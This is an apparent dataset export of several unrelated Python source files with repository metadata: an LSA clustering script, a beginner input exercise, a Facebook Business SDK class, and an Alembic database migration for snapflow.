tokenized_docs = tokenizer.tokenize(xs.documents)
#MAP TO VECTOR AND SEMANTIC SPACE
tfidf = TfIdf.TfIdf(tokenized_docs)
lsa = Lsa.Lsa(tfidf, num_topics = num_lsa_topics)
full_lsa_matrix = MatrixHelper.gensim_to_python_mdarray(lsa.distance_matrix, num_lsa_topics)
#TODO Partition into Docs by LSA sim
txt_codes = xs.text_codes
clusters_per_text_code = int(round( k/ float((len(txt_codes)))))
#Extract the sm code rows from LSA
smCodeRows = ListHelper.filter_list_by_index(full_lsa_matrix, xs.sm_code_indices)
smCodeClassifications = ListHelper.filter_list_by_index(xs.codes_per_document, xs.sm_code_indices)
smCodeCategoryClassifications = ListHelper.filter_list_by_index(xs.categories_per_document, xs.sm_code_indices)
# Dict of <code, list[list]]> - LSA row vectors
logging.info("Partitioning LSA distance_matrix by Source Document")
txtMatrixByCode = PartitionByCode.partition(full_lsa_matrix, xs, xs.text_codes)
closest_docs = [find_closest_document(txtMatrixByCode, row) for row in smCodeRows]
matrix_by_doc = collections.defaultdict(list)
for i, doc in enumerate(closest_docs):
matrix_by_doc[doc].append(smCodeRows[i])
#Stores all cluster labels
logging.info("Clustering within a document")
all_smcode_labels = []
label_offset = 0
for doc in xs.text_codes:
distance_matrix = matrix_by_doc[doc]
#CLUSTER
clusterer = Clusterer.Clusterer(clusters_per_text_code)
labels = clusterer.Run(distance_matrix)
all_smcode_labels = all_smcode_labels + [int(l + label_offset) for l in labels]
label_offset += clusters_per_text_code
#OUTPUT
file_name_code_clusters = "Partition_By_Doc_LSA_SMCODES_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
ClustersToFile.clusters_to_file(file_name_code_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeCategoryClassifications, "Chicago")
#TODO - filter the category and the docs per docs to the sm codes and output
#file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.txt".format(k, num_lsa_topics)
#ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
print "Finished processing lsa clustering for dims: {0} and k: {1}".format(num_lsa_topics, k)
if __name__ == "__main__":
#k = cluster size
#for k in range(40,41,1): #start, end, increment size
# train(300, k)
train(num_lsa_topics = 300, k = 30)
|
[
"simon.hughes@dice.com"
] |
simon.hughes@dice.com
|
2408590522753e9cd86637c0677554589f285d76
|
c9d4d4c78703d009da11999e4e59b6a168a454a2
|
/examples/Learning Python The Hard Way/ex11_AskingQuestions.py
|
be33a059dc6c1cfcccb68bbc63af5f196c02ccc2
|
[
"MIT"
] |
permissive
|
AkiraKane/Python
|
23df49d7f7ae0f375e0b4ccfe4e1b6a077b1a52b
|
12e2dcb9a61e9ab0fc5706e4a902c48e6aeada30
|
refs/heads/master
| 2020-12-11T07:20:01.524438
| 2015-11-07T12:42:22
| 2015-11-07T12:42:22
| 47,440,128
| 1
| 0
| null | 2015-12-05T03:15:52
| 2015-12-05T03:15:51
| null |
UTF-8
|
Python
| false
| false
| 335
|
py
|
'''
Created on 2013-8-14
@author: Kelly Chan
Python Version: V3.3
Book: Learn Python The Hard Way
Ex11: Asking Questions
'''
print("How old are you?")
age = input()
print("How tall are you?")
height = input()
print("How much do you weigh?")
weight = input()
print("So, you're %r old, %r tall and %r heavy." % (age, height, weight))
|
[
"kwailamchan@hotmail.com"
] |
kwailamchan@hotmail.com
|
238ec91f069f7201b85bb750838f5ebd9b18ecd9
|
ce083128fa87ca86c65059893aa8882d088461f5
|
/python/pytest-labs/.venv/lib/python3.6/site-packages/facebook_business/adobjects/productdaeventsamplesbatch.py
|
6155974b1405f7c8bc729960a751f6b815d8bc6d
|
[] |
no_license
|
marcosptf/fedora
|
581a446e7f81d8ae9a260eafb92814bc486ee077
|
359db63ff1fa79696b7bc803bcfa0042bff8ab44
|
refs/heads/master
| 2023-04-06T14:53:40.378260
| 2023-03-26T00:47:52
| 2023-03-26T00:47:52
| 26,059,824
| 6
| 5
| null | 2022-12-08T00:43:21
| 2014-11-01T18:48:56
| null |
UTF-8
|
Python
| false
| false
| 2,489
|
py
|
# Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from facebook_business.adobjects.abstractobject import AbstractObject
"""
This class is auto-generated.
For any issues or feature requests related to this class, please let us know on
github and we'll fix in our codegen framework. We'll not be able to accept
pull request for this class.
"""
class ProductDaEventSamplesBatch(
AbstractObject,
):
def __init__(self, api=None):
super(ProductDaEventSamplesBatch, self).__init__()
self._isProductDaEventSamplesBatch = True
self._api = api
class Field(AbstractObject.Field):
samples = 'samples'
time_start = 'time_start'
time_stop = 'time_stop'
class AggregationType:
content_id = 'CONTENT_ID'
content_url = 'CONTENT_URL'
class Event:
viewcontent = 'ViewContent'
addtocart = 'AddToCart'
purchase = 'Purchase'
initiatecheckout = 'InitiateCheckout'
search = 'Search'
lead = 'Lead'
addtowishlist = 'AddToWishlist'
_field_types = {
'samples': 'list<Object>',
'time_start': 'unsigned int',
'time_stop': 'unsigned int',
}
@classmethod
def _get_field_enum_info(cls):
field_enum_info = {}
field_enum_info['AggregationType'] = ProductDaEventSamplesBatch.AggregationType.__dict__.values()
field_enum_info['Event'] = ProductDaEventSamplesBatch.Event.__dict__.values()
return field_enum_info
|
[
"marcosptf@yahoo.com.br"
] |
marcosptf@yahoo.com.br
|
4637ad8e57ec88e45fda29f4a08e4b0144d0f669
|
f0e11aeb7b5bd96c828cf39728eb2fa523f320df
|
/snapflow/migrations/versions/7d5638b5d74d_initial_migration.py
|
8b85094b11b08e55368d3320bb0b4bdb56eecc13
|
[
"BSD-3-Clause"
] |
permissive
|
sathya-reddy-m/snapflow
|
7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db
|
9e9e73f0d5a3d6b92f528ef1e2840ad92582502e
|
refs/heads/master
| 2023-05-01T05:14:08.479073
| 2021-05-21T00:14:56
| 2021-05-21T00:14:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,528
|
py
|
"""Initial migration
Revision ID: 7d5638b5d74d
Revises:
Create Date: 2021-05-17 20:55:42.613348
"""
import snapflow
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7d5638b5d74d"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"_snapflow_data_block_metadata",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.String(length=128), nullable=False),
sa.Column("inferred_schema_key", sa.String(length=128), nullable=True),
sa.Column("nominal_schema_key", sa.String(length=128), nullable=True),
sa.Column("realized_schema_key", sa.String(length=128), nullable=False),
sa.Column("record_count", sa.Integer(), nullable=True),
sa.Column("created_by_node_key", sa.String(length=128), nullable=True),
sa.Column("deleted", sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_data_function_log",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("node_key", sa.String(length=128), nullable=False),
sa.Column("node_start_state", sa.JSON(), nullable=True),
sa.Column("node_end_state", sa.JSON(), nullable=True),
sa.Column("function_key", sa.String(length=128), nullable=False),
sa.Column("function_params", sa.JSON(), nullable=True),
sa.Column("runtime_url", sa.String(length=128), nullable=True),
sa.Column("queued_at", sa.DateTime(), nullable=True),
sa.Column("started_at", sa.DateTime(), nullable=True),
sa.Column("completed_at", sa.DateTime(), nullable=True),
sa.Column("error", sa.JSON(), nullable=True),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_generated_schema",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("key", sa.String(length=128), nullable=False),
sa.Column("definition", sa.JSON(), nullable=True),
sa.PrimaryKeyConstraint("key"),
)
op.create_table(
"_snapflow_node_state",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("node_key", sa.String(length=128), nullable=True),
sa.Column("state", sa.JSON(), nullable=True),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("env_id", "node_key"),
)
op.create_table(
"_snapflow_data_block_log",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("function_log_id", sa.Integer(), nullable=False),
sa.Column("data_block_id", sa.String(length=128), nullable=False),
sa.Column("stream_name", sa.String(length=128), nullable=True),
sa.Column(
"direction",
sa.Enum("INPUT", "OUTPUT", name="direction", native_enum=False),
nullable=False,
),
sa.Column("processed_at", sa.DateTime(), nullable=False),
sa.Column("invalidated", sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(
["data_block_id"],
["_snapflow_data_block_metadata.id"],
),
sa.ForeignKeyConstraint(
["function_log_id"],
["_snapflow_data_function_log.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_stored_data_block_metadata",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.String(length=128), nullable=False),
sa.Column("name", sa.String(length=128), nullable=True),
sa.Column("data_block_id", sa.String(length=128), nullable=False),
sa.Column("storage_url", sa.String(length=128), nullable=False),
sa.Column(
"data_format",
snapflow.core.metadata.orm.DataFormatType(length=128),
nullable=False,
),
sa.ForeignKeyConstraint(
["data_block_id"],
["_snapflow_data_block_metadata.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_alias",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("name", sa.String(length=128), nullable=True),
sa.Column("data_block_id", sa.String(length=128), nullable=False),
sa.Column("stored_data_block_id", sa.String(length=128), nullable=False),
sa.ForeignKeyConstraint(
["data_block_id"],
["_snapflow_data_block_metadata.id"],
),
sa.ForeignKeyConstraint(
["stored_data_block_id"],
["_snapflow_stored_data_block_metadata.id"],
),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("env_id", "name"),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("_snapflow_alias")
op.drop_table("_snapflow_stored_data_block_metadata")
op.drop_table("_snapflow_data_block_log")
op.drop_table("_snapflow_node_state")
op.drop_table("_snapflow_generated_schema")
op.drop_table("_snapflow_data_function_log")
op.drop_table("_snapflow_data_block_metadata")
# ### end Alembic commands ###
|
[
"kenvanharen@gmail.com"
] |
kenvanharen@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.